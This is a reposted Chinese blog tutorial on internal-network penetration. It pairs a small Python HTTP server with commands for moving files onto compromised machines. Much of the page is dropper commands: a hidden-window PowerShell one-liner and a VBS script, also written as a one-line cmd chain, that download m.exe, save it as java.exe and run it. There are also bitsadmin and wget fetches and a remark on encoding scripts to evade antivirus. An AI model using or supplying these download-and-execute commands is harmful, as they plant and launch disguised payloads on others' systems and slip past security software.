當前位置：首頁 > 编程语言 > python >内容正文

python

python局域网大文件_[源码]Python简易http服务器(内网渗透大文件传输含下载命令)...

發布時間：2024/7/5 python 26 豆豆

生活随笔收集整理的這篇文章主要介紹了 python局域网大文件_[源码]Python简易http服务器(内网渗透大文件传输含下载命令)... 小編覺得挺不錯的,現在分享給大家,幫大家做個參考.

Python簡易http服務器源碼

import SimpleHTTPServer

import SocketServer

import sys

PORT = 80

if len(sys.argv) != 2:

print("use: web.exe port")

else:

PORT = int(sys.argv[1])

Handler = SimpleHTTPServer.SimpleHTTPRequestHandler

httpd = SocketServer.TCPServer(("", PORT), Handler)

print "SimpleHTTPServer is ", PORT

print "by k8gege"

httpd.serve_forever()

用法:

python web.py 端口

web.exe 端口

訪問: http://IP:端口

內網滲透

機器A：可上網

機器B：不聯網

0x001 機器A文件傳到機器B

使用方法,自行打包成可執行文件傳到機器部署Web

然后在機器B上通過wget、VBS、Powershell等命令下載文件到機器B

0x002 機器B文件傳到機器A

當然也可以反過來，將此程序上傳到不可上網機器部部署web

再通過機器A下載機器B文件

0x003 速度

WGET內網下載速度高達70M/S

下載命令

下載者(隱藏窗口)

powershell -WindowStyle Hidden "IEX (New-Object Net.WebClient).DownloadFile('http://192.168.85.131/m.exe','c:\windows\temp\java.exe');Start-Process c:\windows\temp\java.exe"

系統自帶bitsadmin下載文件(python簡易WEB服務器不太友好，可能會報錯)

bitsadmin /transfer n http://192.10.1.8/img/wget.exe C:\WINDOWS\Temp\wget.exe

VBS下載者

Set Post = CreateObject("Msxml2.XMLHTTP")

Set Shell = CreateObject("Wscript.Shell")

Post.Open "GET","http://192.168.25.128:13272/m.exe",0

Post.Send()

Set aGet = CreateObject("ADODB.Stream")

aGet.Mode = 3

aGet.Type = 1

aGet.Open()

aGet.Write(Post.responseBody)

afile = "java.exe"

aGet.SaveToFile afile,2

Shell.Run (afile)

如果僅有CMD權限,可用K8飛刀將VBS轉成一行命令執行

如果有殺軟也可通過隨機ASCII碼加密進行免殺(個別殺軟不行了)

CMD命令-VBS下載者

del K8.vbs&echo Set Post = CreateObject("Msxml2.XMLHTTP") >> K8.vbs&&echo Set Shell = CreateObject("Wscript.Shell") >> K8.vbs&&echo Post.Open "GET","http://192.168.25.128:13272/m.exe",0 >> K8.vbs&&echo Post.Send() >> K8.vbs&&echo Set aGet = CreateObject("ADODB.Stream") >> K8.vbs&&echo aGet.Mode = 3 >> K8.vbs&&echo aGet.Type = 1 >> K8.vbs&&echo aGet.Open() >> K8.vbs&&echo aGet.Write(Post.responseBody) >> K8.vbs&&echo afile = "java.exe" >> K8.vbs&&echo aGet.SaveToFile afile,2 >> K8.vbs&&echo Shell.Run (afile) >> K8.vbs&&cscript K8.vbs&&del K8.vbs

以上命令可能不太方便,或者傳輸速度較慢,特別是侈傳大文件的時候就知道了(不支持端口續傳你就得重新下載)

我們可以通過以上方法將Wget先下載過去，再通過Wget下載文件

Wget下載(Linux自帶,win需傳過去)

wget -P /tmp http://39.109.6.128/cmd.txt

終極方法(cmd直接輸出文件)

工具k8exe2bat：? https://www.cnblogs.com/k8gege/p/10585903.html

將任意文件轉成BAT,通過Bat直接輸出文件到目標,在條件非常奇葩的情況下可使用。

因為轉出來的命令比較多，僅能執行CMD時會比較麻煩，如果可上傳BAT執行還好

PS: 很簡單但很多人不懂，特別是客戶或新人，遇到不懂的直接發文章給他(可能工具還得編譯好的)

當然如果內網自帶WEB或其它可用文件傳輸工具,再自已弄個web進行文件傳輸就是SB了

總結

以上是生活随笔為你收集整理的python局域网大文件_[源码]Python简易http服务器(内网渗透大文件传输含下载命令)...的全部內容，希望文章能夠幫你解決所遇到的問題。

如果覺得生活随笔網站內容還不錯，歡迎將生活随笔推薦給好友。

上一篇： python ftplib_python
下一篇： python ssh实现_SSH协议的P